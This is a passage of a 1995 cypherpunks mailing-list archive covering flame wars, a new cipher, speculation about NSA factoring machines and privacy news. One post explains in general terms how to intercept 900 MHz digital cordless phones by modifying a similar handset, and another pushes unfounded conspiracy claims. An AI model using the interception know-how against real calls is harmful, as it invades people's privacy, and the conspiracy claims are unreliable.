With Blaze And Weinstein In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org> Message-ID: <199512202337.SAA10846@thor.cs.umass.edu> Anonymous "Bill Gates" writes: > I'm not trying to start a flame war. Bullshit. [inconsequential prattle elided] This thread is completely off-topic. Besides, we've gone through all this on the list before. Let's not continue it. We all have more productive things to do with our time. -Futplex From EALLENSMITH at mbcl.rutgers.edu Wed Dec 20 15:45:25 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Wed, 20 Dec 95 15:45:25 PST Subject: NTT & electronic "cash" Message-ID: <01HZ1GUUJERK8Y52ZW@mbcl.rutgers.edu> This qualifies as one of the most uninformative news items I've seen from Reuters. Anyone know any substantive info on their process? -Allen --------------------- Reuters New Media _ Wednesday December 20 2:04 PM EST _ NTT Says Develops Secure Electronic Cash System TOKYO- Nippon Telegraph and Telephone said today that it has developed a secure electronic cash system which can be used for settling transactions on the Internet and in daily life using smart cards. "The system has very secure algorithms, and that makes fraudulent uses of the system very difficult," NTT researcher Mikio Suzuki told Reuters. From mpj at netcom.com Wed Dec 20 15:48:44 1995 From: mpj at netcom.com (Michael Paul Johnson) Date: Wed, 20 Dec 95 15:48:44 PST Subject: Ruby Block Cipher Message-ID: -----BEGIN PGP SIGNED MESSAGE----- The Ruby Block Cipher has just been published. It is not a general block cipher in that it cannot be used in Electronic Codebook (ECB) mode. It is more like a cryptographic hash function with a block size of only 64 bits. Of course, 64 bits is too short for a cryptographic hash function intended for digital signature use, but it is just fine for a quick block cipher. This may be a good reference for those folks who want a quick & easy encryption algorithm that need not withstand nuclear attack but can provide something better than common weak encryption methods in use in the software industry. Your comments and suggestions on this rather strange little cipher are welcome. Information on the Ruby Block Cipher is available as ftp://ftp.csn.net/mpj/public/ruby_m4.ps and, if you are in the USA or Canada, a reference implementation is in ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/mpj/rubycode.zip where the ??????? is revealed in ftp://ftp.csn.net/mpj/README rubycode.zip is also available on the Colorado Catacombs BBS at 303-772-1062. Note: this is not a product for sale (it is free and probably worth at least as much as you pay for it). It is also not a prepublication (it is THE publication in electronic form with no paper publication anticpated in the near future). ___________________________________________________________ | | |\ /| | | Michael Paul Johnson Colorado Catacombs BBS 303-772-1062 | | \/ |o| | PO Box 1151, Longmont CO 80502-1151 USA Jesus is alive! | | | | / _ | mpj at csn.net aka mpj at netcom.com m.p.johnson at ieee.org | | |||/ /_\ | ftp://ftp.csn.net/mpj/README.MPJ CIS: 71331,2332 | | |||\ ( | http://www.csn.net/~mpj -. --- ----- .... | | ||| \ \_/ | PGPprint=F2 5E A1 C1 A6 CF EF 71 12 1F 91 92 6A ED AE A9 | |___________________________________________________________| -----BEGIN PGP SIGNATURE----- Version: 2.7.1 iQCVAgUBMNiaP/X0zg8FAL9FAQHe0AP+N+tBxoaIdny3CEgxdA8LO9+5VyYiOety qYBc9aCrCbw4TpsFTcsg5bosPlkm3H+VwpWVGOshfl5p69J893jrma07xRamEvM0 /1Mro3X/Ga4SQ7rjHPSdPCBR3YxSA7UoIx27gldTBty2k8WAAeH0BTbn/5s1bGrf ej9ab/rd7Jc= =QRjc -----END PGP SIGNATURE----- P. S. -- I don't normally read this list, so please send a copy of follow-ups directly to me. Thanks! From hallam at w3.org Wed Dec 20 16:12:29 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 20 Dec 95 16:12:29 PST Subject: The Problem With Blaze And Weinstein In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org> Message-ID: <9512210012.AA19612@zorch.w3.org> I think this conversation is getting silly even by net.standards. On the one hand we have the screaming libertarians with a bunch of wedged political notions about property. On the other we have what appear to be arch anti-capitalists claiming that nobody who earns a living out of crypto can be a cypherpunk. What is really strange is that these appear to be the _same_ people. Now I'm not one for supporting corporativism but consider this, most if not all of the technical contributors to this list who can earn money from their crypto knowledge do so. Matt and Jeff are not alone in being paid for their abilities. Another thing is that many of us are also into government contract work up to their necks. The Web consortium is funded partly through an ARPA grant. MIT is practically floating on government subsidies. Yes this is where your tax dollars go, learn to love it or die bitching. The point is that the tourist element who gripe on about nothing other than their political views and never contribute any technical input are not the people that make the list work. People like Matt and Jeff are the people who make the list worthwhile. Phill From adam at homeport.org Wed Dec 20 16:35:58 1995 From: adam at homeport.org (Adam Shostack) Date: Wed, 20 Dec 95 16:35:58 PST Subject: ex encrypted script In-Reply-To: <199512202339.RAA05220@cdale1.midwest.net> Message-ID: <199512210039.TAA24305@homeport.org> Jason Rentz wrote: | Forgive me if this is a stupid question. Hmmm. Will you pay us? | I'm using AT&T unix Version 5 release 3.2.2 ( UNIX System V/386 Release 3.2) [...] | Is there a way to encrypt a script yet still allow it to be runnable? I | know that the simple answer is to write it in C and compile it but I don't | have the means of doing that at the moment. (i.e. there is not compiler on | the system) | | I thought of a few simple protections but they all involve decrypting before | running. Ever hear of chmod? chown? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From anon-remailer at utopia.hacktic.nl Wed Dec 20 16:55:57 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 20 Dec 95 16:55:57 PST Subject: What ever happened to... Cray Comp/NSA co-development Message-ID: <199512210053.TAA11344@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- First, thanks for the obvious 'kind' thoughts Tim... It's heartening that you took the time to add some substantial info to the thread. However... > On 12/18/95 At 12:36 AM -0500, Timothy C. May wrote: > >What caught my attention was the architecture. > > > >A "hybrid design linking two supercomputer processors with an > >array of HALF A MILLION inexpensive processors" that were > >designed by the U.S. government laboratory affiliated with the > >NSA. The same chip house that brought us Clipper. > First, half a million chips is not that big a deal...the Connection Machine > had up to 64,000. Very few cryptographic problems of interest to us will be > affected by a mere factor of a million or so. O.K. Just a factor of 16 increase over the CM architecture right? Not knowing the computational capabilities of the individual processors, it might be difficult to say what the machine is capable of. Wouldn't that have some bearing? > Second, there was work on a "processor-in-memory" architecture, in > conjunction with a Bowie, Maryland spook-connected company. Perhaps this is > what you are thinking of? I didn't mention a 'processor-in-memory' architecture and neither did the NYT article. Don't know about any other company involvement, just CCC and NSA. > Third, all avenues of continued funding having fallen through, Cray > Computer (not Cray Research, of course) was shut down and assets > liquidated. I haven't heard what's become of Seymour, though. (He is > undoubtedly an asset, buy I doubt the Agency would have him liquidated.) You mean the avenues that are of PUBLIC record. The possibility could always exist that the development continues 'in-house'. It wouldn't be the first time that sort of move has been played. > >I've not kept up with the "ultimate" demise that eventually > >befell Cray Computer Company, but the October 16 FBI filing > >on capacity for Digital Telephony got me thinking back to this > >article. 1% seems like a rather huge need for horsepower. And > >what if GAK doesn't fly? And the widespread use of hard crypto > >just keeps increasing? > The tightly-coupled supercomputers are hardly needed for these sorts of > problems. You mean the problem of data collection? Well, it's true that this would be a misuse of a supercomputer's specialized talents. > >This kind of machine could, in theory: > > > >1) Implement ALL Clipper(II) based Key Escrow functionality in > > silicon (the easy part) AND allow for simultaneous decrypt and > > surveil of 'who knows how many' Clipper based data streams. > Huh? First, what evidence do you have for this claim? Second, who cares? > Implementing Clipper in a Cray Computer machine--why bother? [Rant mode on] Speculation Tim... I'm SPECULATING. Could, in theory... AND my kind of theory probably has holes you could drive a FLEET of Mack trucks through. I have NO evidence. I'm not sure WHO would care. I'M A PARANOID DILLUSIONAL PSYCHOPATH! O.K. well maybe not that last part... but I'm asking the questions, remember? I said I'm new here, so if your going to blow holes in my pet theories, then do me the 'kindness' of using an accurate weapon... that's why I posted... > As to the claim that a million-processor machine could do this, you need to > work out the math. (If a backdoor exists, or the LEAF has been gotten, a > supercomputer is not needed....) Again... I claimed NOTHING! SPECULATED MUCH! Now it's your turn... Why would YOU build a machine like this? What could POSSIBLY be it's capabilities? Speculate with me for a moment... *_take a chance_*. > >2) Implement general RSA based Prime Factoring functionality in > > silicon (the not so easy part) AND allow massively parallel > > decrypt and surveil of 'who knows how many' RSA/etc. based > > data streams. > Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime > has two factors.) Yes, my terminology sucks! But you get the drift don't you? Math is not a strength of mine, I only know in very general terms what is involved (why, then, am I even bothering to bring this up?). Because I AM however, VERY concerned in the continual erosion of privacy rights in all forms communications, electronic and otherwise. [Rant mode off] > If you mean using supercomputers to brute force the general factoring of an > RSA modulus, this is nonsense. While there may be math shortcuts we don't > yet publically know about which make factoring easier than we currently > think it is, a mere million or even a billion processors will not make a > dent in the factoring of, say, a 700-digit modulus. See the tables in > Schneier and elsewhere for some estimates of factoring efforts needed. Nonsense? Is that 700 decimal digits or 700 binary digits? I don't have the tables that you refer to. Where may I find them? (LOL) > >3) Implement it all, AND 'on-line' transaction based surveillance > > via the FBI's 1% capacity infrastructure. > Let's see some numbers. (On second thought, let's not.) No, I've already said that math is not a strength I possess. I've wondered about the ability of the FBI to count on ten fingers and ten toes given some of the justification that I've read for this capacity figure... > >Chilling... Who needs key escrow (or RSA private keys) when > >you've got a massively parallel prime factoring machine. What if > >GAK was to become a 'non-issue'? How fast do you think a machine > >such as this could factor RSA 129? > Well, do the math. The MIPS-years for the RSA-129 crack were publicized, so > the computation for a million SPARC-equivalent (or even > UltraSPARC-equivalent) can be done. Sorry... I asked the question... and your speculation is (I would hope) MUCH more accurate than mine. Again, math is not a strength of mine. > When you've done this, and concluded that RSA-129 could be done in, say, X > minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT > group), and on to the 1024- and 2048-bit keys. Tell us how many years or > centuries it will take. (Hint: Rivest and Schneier have done these > calculations....) Yes, I believe that I've read Rivest's paper on the statistical probabilities. I've never really believed in statistics, AND I'm sure you don't have the time to convince me Tim (I'm sorry if I've been less than reverencial about this, but I'm from Illinois which is right next door to Missouri). > --Tim May, who fears that he's just been trolled by Derek Atkins No Tim, you have not... but on another note... > It'll be _many_ years before a 384-decimal-digit number is factored, I > suspect. Let alone a 600-digit modulus, with or without the mysterious > "transphaser" technology mentioned by Anitro. The "transphaser" is an optical equivalent to the transistor. It is a quantum threshold optical switch, but it is not a 'mystery'. You should read Scientific American more often ;> O.K. I'm done with this line of discussion, you may however, continue to elaborate as I will, no doubt, continue to read... Anitro "I have a little shadow that goes in and out with me, And what can be the use of him is more than I can see" R. L. Stevenson - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMNiv8SoZzwIn1bdtAQHyewF+OXlM8KueHrCynKGhjqXy8eHLSonn12Df vcAdDoaajoi5t7CfY9lP/+FNeO2JKE+v =SIKC -----END PGP SIGNATURE----- From cpunk at remail.ecafe.org Wed Dec 20 17:10:00 1995 From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer) Date: Wed, 20 Dec 95 17:10:00 PST Subject: The Problem With Blaze And Weinstein Message-ID: <199512210112.BAA05503@pangaea.ang.ecafe.org> I'm not trying to start a flame war, just telling people what's REALLY happening. ATT and Netscape are both tools of the CIA/NSA. Blaze and Weinstein are in on the plot to force GAK upon us. Neither one says enough about the evils of GAK on their web page, so they're obviously for GAK and only pretending to be against it to fool the cypherpunks and curry favor with their NSA masters. Evidently the cypherpunks are all too impressed with Blaze and Weinstein's master degrees to see what's really happening. Only true visionaries like myself and Dr. Frederic B Cohen are telling it like it is; everyone else has had the wool pulled over their eyes by the NSA/ATT/Netscape axis. It's amazing how clear everything becomes once one stops taking the medication that THEY prescribed. s/ Bill Gates From die at pig.die.com Wed Dec 20 17:35:00 1995 From: die at pig.die.com (Dave Emery) Date: Wed, 20 Dec 95 17:35:00 PST Subject: 900mhz digital phones - how much to trust ? In-Reply-To: <199512202219.OAA26567@software.net> Message-ID: <9512210134.AA05683@pig.die.com> > John Pettitt, jpp at software.net writes: > > > Whats the current thinking on the security level of 900Mhz digital spread > sectrum cordless phones? Clearly it's not a basic scanner job but how much > more equipment is needed to monitor one ? The easiest way to do this is to simply buy a similar phone which has all the required signal processing hardware for that particular type of spread spectrum and modify it to receive promiscuously and not transmit while doing so, As far as I know, essentially no cordless phones use any kind of actual secure encryption of the digital bit stream, so all you have to do is ensure that your shadow phone is primed with the correct spreading sequence or hopping sequence and is tuned to the right center frequency. Typically choices for these are very limited (maybe 20 channels) and modifying the micro firmware in a phone or base unit to search all possiblities is realistic, especially with the help of an external PC as controller. The digital 900 mhz phones all use different proprietary modulation schemes, but many of them simply transmit a FSK or BPSK rf carrier digitally modulated by the output bitstream of a codec chip (CVSD or regular u-law PCM) on one of several randomly selected channels, perhaps slowly hopping from channel to channel in a fixed sequence. Even the phones that use direct sequence spreading are effectively just transmitting a fast BPSK signal modulated at the chip rate. Receivers and signal processing boxes capable of dealing with this kind of digital modulation are a standard commodity item in the spook world (made by Condor Systems and Watkins Johnson and the like) and even sometimes show up on the high tech surplus market (and are collected by some of us who collect high tech spook hardware as a hobby) - they are however very expensive compared with simply modifying a couple of real phones to do the job. The digital modulation and "spread spectrum" features of 900 mhz phones are primarily intended to allow them to share the 902-928 mhz band with all the other users (other phones, truck tracking systems short range wireless video cameras and video distribution, various industrial users, wireless LANs of several types, ham radio operators, and several other types of unlicensed uncoordinated devices radiating up to 1 watt of power) without suffering the kind of interference that has plagued the older 46/49 mhz FM type. The FCC in fact requires some level of spectrum spreading for this purpose but leaves the actual choice up to the implementor rather than establishing a standard method. Obviously only a secure form of encryption with randomly chosen and wide enough keys would really make intercepting a digital cordless phone difficult for someone determined to do so, especially if they were targeting one particular phone. I believe almost all of the manufacturers have chickened out in the face of NSA and ITAR and not even implemented toy encryption with random keys - they are simply assuming that Joe Sixpack or his 14 year old son won't be able to pick them up on a commercially available scanner and that the federal law banning sale of scanners capable of intercepting digital transmissions and converting them to analog listenable audio will keep the scanner companies from marketing such and keep customers from complaining about nosey neighbors listening to their calls. But don't assume that if someone really has some serious reason to want to intercept one they won't be able to - and it is almost certain that expensive ($5-$20K) DSP based systems capable of intercepting several common types are already for sale to the usual suspects. And finally one should not forget that unless one has an ISDN line, intercepting calls on regular analog subscriber loops (normal telephone lines) by virtually undetectable simple alligator clip class wiretaps or bugs is something that any bright 12 year old can pull off (and many do before they grow up) - so if you have something to hide you shouldn't trust the phone at all. Dave Emery die at die.com From blancw at accessone.com Wed Dec 20 17:44:09 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Wed, 20 Dec 95 17:44:09 PST Subject: FTC Privacy Initiative (fwd) Message-ID: <9512210144.AA04101@pulm1.accessone.com> From: Jyri Kaljundi From: Internet Marketing Discussion List The US Federal Trade Commission has launched a "Privacy Initiative" to investigate whether the information collected at websites (either that affirmatively submitted by a visitor via a form or information collected based upon a visitor's selection of pages at a site to reflect personal interests) should be the subject of regulation by the FTC. ............................................... "Hey, we can't just stand around here with nothing to do. Give us something to regulate - anything, pro or con; we must regulate something." Dang! .. Blanc From attila at primenet.com Wed Dec 20 17:45:29 1995 From: attila at primenet.com (attila) Date: Wed, 20 Dec 95 17:45:29 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: Message-ID: Harmon: Have you forgotten polite society? Have you forgotten what your mother (should have) told you? "If you can not say something nice, don't say it." --in particular refrain from personal attacks. It is one thing to criticize, but it is another to blather unintelligibly without any knowledge than your own bias --and maybe your own intellectual ignorance and bigotry. if you have not walked in the other's shoes, keep silent. now, if you will please excuse us, Perry has code to write --and I have code to write. lastly, if you can not onserve reasonable decorum, sign for alt.christian and post heretical ravings, and if you are desparate for attention or your name in lights, join alt.flame and have at it. ATTILA On Wed, 20 Dec 1995, Dan Harmon wrote: > > Perry, > > the only crypto code you seem to do is the unintelligble postings > that you send to the list. > > .d > > On Wed, 20 Dec 1995, Perry E. Metzger wrote: > > > > > Dan Harmon writes: > > > If this is what you consider contributing them you seem to have some > > > deep problems that cannot be solved here. You may have to seek professional > > > help. Your continued and at times seemingly uncontrollable use of vulgar > > > language may indicate a neurobiological disorder such as Tourette's > > > syndrome. You really should have it checked out before you harm yourself > > > and possibily others. > > > > Thank you for the pseudopsychology, but really, all you've done is > > further confirm my diagnosis of "non-contributing asshole". > > > > When was the last time you did anything to actually help spread > > cryptography, eh? > > > > If you'll pardon me, I have crypto code to get back to. > > > > .pm > > > From rsalz at osf.org Wed Dec 20 18:01:40 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 20 Dec 95 18:01:40 PST Subject: ex encrypted script Message-ID: <9512210158.AA07882@sulphur.osf.org> >Is there a way to encrypt a script yet still allow it to be runnable? I >know that the simple answer is to write it in C and compile it but I don't >have the means of doing that at the moment. (i.e. there is not compiler on >the system) Given your constraints: no. /r$ From rsalz at osf.org Wed Dec 20 18:03:07 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 20 Dec 95 18:03:07 PST Subject: The Problem With Blaze And Weinstein Message-ID: <9512210200.AA07896@sulphur.osf.org> > MIT is practically floating on government subsidies. Actually, if you discount Lincoln Labs, not really. /r$ From alano at teleport.com Wed Dec 20 18:06:40 1995 From: alano at teleport.com (Alan Olsen) Date: Wed, 20 Dec 95 18:06:40 PST Subject: Surprise telecommunications bill? Message-ID: <2.2b7.32.19951221020731.008be6d4@mail.teleport.com> While watching the national news (NBC, I think) they mentioned that there had been a "surprising agreement on a telecommunications bill". From the sparse description, it sounded pretty nasty. Does anyone have any additional information on this? | Remember: Life is not always champagne. Sometimes it is REAL pain. | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From vznuri at netcom.com Wed Dec 20 18:08:21 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 20 Dec 95 18:08:21 PST Subject: on web standards: sent to Markoff In-Reply-To: Message-ID: <199512210204.SAA26757@netcom20.netcom.com> there's been MS flamewars on this list before, but Attila repeats various snippets that I find highly objectionable. cpunk relevance: operation of the free market Gates' conquests can either be made out to be a failure of the free enterprise system or a success from it. the more I read whining complaints about MS's dominance, the more I prefer the latter interpretation. perhaps power corrupts, but on the other hand failure clearly promotes whining. "you cannot grow taller by chopping off the heads of others". I've seen so many people try to smear MS with innuendo, as if "enough people being unhappy" at a company is ample evidence that there is "unfairness". the marketplace is *not* fair. it rewards people who are in tune with it disproportionately!! sometimes, *dramatically*so* as in the case with Gates. consider this anecdote. a market for [x] gizmos does not even exist. a brilliant person says, " I think people really need [x] gizmos. I'm going to make and sell them. I'm going to find people who will help me, but if I can't find any I'm going to do it all myself". Gates is such a person and did it with PC OS'es and various windows applications (Excel, Word Perfect, etc.). he bet his entire future on the idea that he knew what people wanted even when other companies disagreed. all companies had a chance to get on the windows bandwagon and write decent software when he created this OS-- he was going around and virtually begging companies. what did they say? "no, we aren't going to take our chance with you. we don't think people really want your @#$$%^&* gizmos". they snickered and sneered at him. Gates succeeds, and sells a bazillion gizmos. he *creates* a market that was not even in existence. or rather, he anticipates what people really want, and the related markets begins to respond to him in a "positive feedback loop". suddenly all these companies cry foul in the greatest of hypocrisy. "Gates has cornered the gizmo market!! he has 95% of it!!! why weren't we notified!! no one should have such power!!" the truth is that the playing field has always been level, but because Gates is such a brilliant genius, market anticipator, and gizmo producer, he succeeds far beyond his or anyone else's wildest dreams. "well, all things should be equal in the competition, unless someone is succeeding more than somebody else, in which case we should penalize them to make things more even" say his competitors. the market has *given* bill gates his dominance. all the arguments about him being "unfair" are absolutely bogus that I have seen. they amount to, "Bill Gates is using tactics to sell more of his software than his competitors. therefore, he's not being fair to everyone else who wants to sell their software as well." hee, hee. I really love the free market. it's a delight that Gates has put his money where his brain is, and in only 20 years built one of the most successful companies in the entire history of business. it's a tribute to the intelligence of the market and people who have the sense to listen to it. MS has gained its dominance through the utmost of hard work, and consuers vote with their $$$. whoever denies that consumers know what they *really* want is an awfully pretentious and deluded person, IMHO. >The conundrum is trying to decide "when" a particular company is a >monopoly by either the classic definition of the Sherman and Clayton Acts >or an effective monopoly, or "bad" player as defined in the >Robinson-Patman act. pioneers are the ones with the arrows in their back. when they fail, everyone sneers at them. when they succeed, everyone sneers at them and says they succeeded through skullduggery. and then competitors refer to this *market* they had no hand in *creating* (the *hard* work is creating a market, *anyone* can capitalize on one once created) as if they have some "right" to it. Gates is the biggest teddybear on the planet. those who are afraid of him only show they are afraid to think as focused and seriously as he does all day. "gosh, we shouldn't have to compete against someone who understands the market so well. what about us? we are competition challenged!! we need a level playing field." > Bill Gates more than satisfies the requirements of defining a monopoly >in Sherman and Clayton with 85% of the desktop locked in and an assualt >with "almost" standards on the open-system server market. NT is already >garnering more than 25% of server installations in business --big >business, since it will be "guaranteed" compatible with their desktop 95s. >The rest of us, stay with the real thing. "no fair!!! Bill Gates has a monopoly on the gizmo market!!! he should be stopped!!! restrained!! otherwise, no other gizmo companies will succeed!!" you have a very short memory. only several years ago most of the population of the planet was in total skepticism about the success of windows. now that it has succeeded, everyone believes that this market should be carved up to everyone that wants a piece of the pie. well, Gates helped "create" the pie in the first place. > Add to MS' virtually absolute domination of the desktop and its >impending domination of the commercial servers the fact that MS has 95% >of the front line office products --WP, Spreadsheet, Database, and mail >with the last be non-standard to long established rules and you do have a >problem to be considered. is anyone twisting people's arms to buy his software? are there a lack of choices because other companies are simply choosing not to compete with MS? if MS is giving customers what they want better than anyone else, (which is proven viscerally by *cash*, people invariably put their money where their mouths are) why is this "a problem to be considered"? > Will the market correct itself? why is MS dominance require "correction"? the fact that you consider it an anomaly shows how naive and ridiculous your position is. MS dominance is absolutely no accident, and anyone who claims it was achieved through anything less than honest competition is in my opinion a whining nonthinker who is afraid of a true, free market realized. > Very questionable since MS rode to >its position on IBM's back and capitalized on IBM's failure to recognize >what they had stumbled into. beautiful, isn't it? one man can "capitalize" on the idiocy of others. oh, poor IBM. they didn't *get*it* even after half a decade, perhaps an entire decade. the big bad Gates Wolf sunk his fangs into IBM. yes, Gates is a dracula. hee, hee. perhaps you would like to start a government program to help poor companies that don't have the brains to understand a market when it is screaming at them in their faces? lets call it the "dog eat dog" welfare fund. > IBM did not fall by the market rejecting IBM >--the market exploded with the PC for price and diversity reasons: you >can not compare direct entry, full screen aplications and >transportability of a PC against a looped, expensive main-frame >connection, if the boss even approves the cost. IBM failed because they had no brain to recognize what was happening around them. Gates did, and his success proves the correctness of his vision. the market is the force that will use or throw away companies as it sees fit. it doesn't care about loyalty to a company that has lost the edge. > Bill Gates >has used his operating system dominance to force hardware vendors to ship >MS products on _every_ machine, or pay substantial penalties in rates 2 >and 3 times larger for all MS products --cheap only if it is universal. Gates is free to demand as much payment for his products and services that the market will bear. if the market decides it's highway robbery, Gates will go the way of the dodo bird. perhaps you think that the government should now subsidize purchase of windows 95 so that everyone can get their copy? > The real issue in DOJ v. MS was that although Bill complied with a >consent decree, he _immediatley_ found other ways to apply the screw, and >many of these newer terms are even worse, but more subtle. And, there is >no question the verbal threats have been significantly worse. all far less than the slimy tactics used by his detractors to limit his ability to compete freely in the market, such as all the "antitrust" laws supposedly relevant to his situation. > To software >vendors it is the threat of denial of technical information on GUIs and >APIs, to hardware manufacturers it is threats of ecomnomic sanctions, >including publishing decertification of the platform for various WIN95 >and NT compliant stickers, etc. why should Bill be forced to do business with people who would love to slit his throat? answer: he doesn't have to. he can flick his finger at them. and if they misunderstand his right to do this, they misunderstand the essence of America. > Bill Gates is NOT an ethical businessman. If the fact was that Bill >was able to garner his position from hard work, a better product, and a >well-greased advertising and marketing organization would not justify the >application of the classic Sherman and Clayton anti-trust rules; the >market will either continue to accept them or not. that's absolutely what he has done, and none of your hocus-pocus flimflamery can rebut this truth. > However, Bill has used his position of 85% in OSs not only to dictate >OS considerations, as bad as they are with DOS nothing more than a boot >sector virus and Windows a pretty program loader, but he has used this >position to dominate the applications market by bundling and forcing >machine integrators to include the MicroSoft applications in return for >the OEM discount on the operating systems. horrors!! you mean that if someone is successful, they have more influence on the market?? *gasp* > Preloading the market by those means is _not_ ethical or good >business. Gates is free to do whatever he likes. the market decides what is appropriate by where it spends its money. so far, it support him. are you going to argue with everyone who spent money on MS products and say, "no, that's not really what you wanted!!" whose business of it is yours to limit the freedom of consumer choice? > Bill Gates _clearly_ violates the FTC provisons on ethical >conduct and restraint of trade by a monopoly or quasi-monopoly position. "Gates is selling all the widgets and gizmos!!! no fair!!!" >Why were nearly 30 OEMs represented anonymously in "friend of the court" >briefs? --and the first thing Billy's (hired virtually every high end firm >in SF) attorneys' did was subpoena the _names_ of the consortium under the >rules of evidence --welcome to the "Kiss of Death." *gasp* -- finding out who is out to slit your throat. yes, it should be mandatory that people can anonymously attack him (as you are doing) without any possibility of consequence. let's just put a bag over his head and let everyone take free punches. that would be appropriate, don't you think? > Personally, I think it is time to dismember Bill Gates --give him a >choice of his OS group or his applications group and literally force him >to sell all direct or indirect interest in the one he does not choose, >plus forego any involvement. unfortunately, your puffhead arguments, falsehoods, innuendoes and hallucinations are beginning to grip people who matter. in fact it is becoming quite trendy to besmirch MS. >Anyone who thinks Bill Gates or Microsoft is a benevolent 800 pound >gorilla has not paid attention in history classes: anyone who thinks that business involves charity for the intellectually challenged has not paid attention to reality of the free market. > power corrupts > absolute power corrupts absolutely. funny how this statement is always assumed to apply to microsoft, not to the companies that are trying to anonymously slash his throat in courts as a desperate resort when they have failed the egalitarian test of the marketplace. From harmon at tenet.edu Wed Dec 20 19:10:00 1995 From: harmon at tenet.edu (Dan Harmon) Date: Wed, 20 Dec 95 19:10:00 PST Subject: An Apology to Mr. Merzger In-Reply-To: <199512202359.SAA29012@jekyll.piermont.com> Message-ID: Perry and members of this list, I want to publicly apologize to Mr. Metzger. On reviewing the events of the day, it seems that I misunderstood a post by Perry. It seems that I was missing a previous post that was being referenced. As to the misunderstood message, I have to now agree with Perry and his reponse. Please accept this apology. Dan From attila at primenet.com Wed Dec 20 19:15:28 1995 From: attila at primenet.com (attila) Date: Wed, 20 Dec 95 19:15:28 PST Subject: The Problem With Blaze And Weinstein In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org> Message-ID: OK, you're afraid of AT&T's lawyers. give me a break --who's chicken? they are not the government, they can not put you in jail and charges would never stick. both Blaze and Weinstein are bound by their employment contracts from discussing political hot-potatoes. Weinstein did state rather emphatically the opinions of the crew at Netscape did not conform to the apparently misguided statements of the dupe of government. blaze has sent plenty of code our way --even obtaining permission from at&t which is a real big brother. Have you been arrested and charged for crypto (non-export)? - I have. Have you been arrested and charged for technology export? - I have. Have you been raided more than once by the Feds? - I have. Have you been excluded from at&t machines except murray hill and other labs because system managers don't like programmers knowledgable in crypto and kernels ? - I have. Did I ever break into systems or alter data --no, that's not ethical. Could I? -yes, presumably some. "Membership" in Cypherpunks is not predicated on supporting _your_ political agenda or beliefs. In fact, too much bandwidth is expended on arguing about political policy. I agree with Perry that postings should be crypto design and implementation. I have suggested that even announcements of crypto political activities should be put up like John Young posts: one paragraph synopsis and a reference to get the whole thing, but no discussion --take it elsewhere. As for the attacks on Perry, they are inexcusable. You obviously have no idea what crypto Perry codes. I have not published crypto code for a long time. I am wrapping up, after a _long_ hiatus, one which will really take their socks off --with their shoes still on. I'd love to release it to public domain, but____ What am I going to do with it? dunno, probably put the tape on the shelf; I escaped the hard hand of justice, a poor man, the last time when I tried to enter the code in evidence. Now I am "20 years older and deeper in debt" [Tennessee Ernie style]; is it worth it? I've done my time, and code has a signature. I think I would prefer to enjoy my five children and a few grandchildren. But it has been a good exercise.... No, Mr. ECafe Anonymous _chicken_, you're the despicable party. Put your imprint on your attacks and accusations: the Constitution says you are entitled to _face_ your accusers. If you want to argue about constitutional or God given rights --do it in other forums. If you want to denigrate blaze, weinstein, perry, and maybe even tcmay, just drop yourself off the cpunk mailing list. meanwhile, get out of our collective faces and let us do a little code, I intend to finish my work, and then I can have a depression trying to decide whether I want to go the round, again. ATTILA ============================== On Wed, 20 Dec 1995, ECafe Anonymous Remailer wrote: > I'm not trying to start a flame war. I'm > sure these people are very smart and have > written lots of good code. I'm sure they're > very nice and never kick their dogs. I'm > just tired of people defending them as > cypherpunks. > > They aren't cypherpunks. > > Neither has come out against GAK. They > both carefully avoid commiting to any > statement. They want us to think they're > "one of us" but they don't want to be > pinned down because they are double dipping > on both sides of the fence. > > Blaze even does "research" on GAK. See > his web page for evidence. Also the TIS > report. The fact that he found a bug in > clipper doesn't change this. It proves > it. He works for the government, via att. > > Weinstein is actively promoting GAK by > working at the company that the government > has chosen to bring it to you now that > att has failed. > > WHY IS EVERYONE SO QUICK TO DEFEND THESE > PEOPLE? DO THEY HAVE YOU ALL SO IMPRESSED > WITH THEIR MASTERS DEGREES THAT YOUR AFRAID > TO LOOK CLOSELY? > > No, I did not post the RSA patch. I wouldn't > touch any of that code with a 5 meter pole. > > To the guy who says write code: I've > written plenty of code. Clue: your probably > running some of it right now. > > I'm anonymous because I've seen FIRST HAND > what the att lawyers do to people who > tell the wrong kind of truth. > > Want me to be a 'nym. OK. > > s/ Bill Gates (he has good lawyers that > can handle att and netscape) > From jya at pipeline.com Wed Dec 20 19:33:08 1995 From: jya at pipeline.com (John Young) Date: Wed, 20 Dec 95 19:33:08 PST Subject: QCF_dec Message-ID: <199512210332.WAA11993@pipe1.nyc.pipeline.com> Science, 8 December 1995 Quantum Computers, Factoring, and Decoherence I. L. Chuang, R. Laflamme, P. W. Shor, W. H. Zurek [First paragraph] The uniqueness of the prime factorization of a positive integer is the Fundamental Theorem of Arithmetic. In practice, the determination of the prime factors of a given number can be an exceedingly difficult problem, even though verification is trivial. This asymmetry is the basis for modern cryptography and provides secret codes used not only on your own bank card but also to transfer diplomatic messages between embassies. [Precis] It is known that quantum computers can dramatically speed up the task of finding factors of large numbers, a problem of practical significance for cryptographic applications. Factors of an L-digit number can be found in ~L^2 time 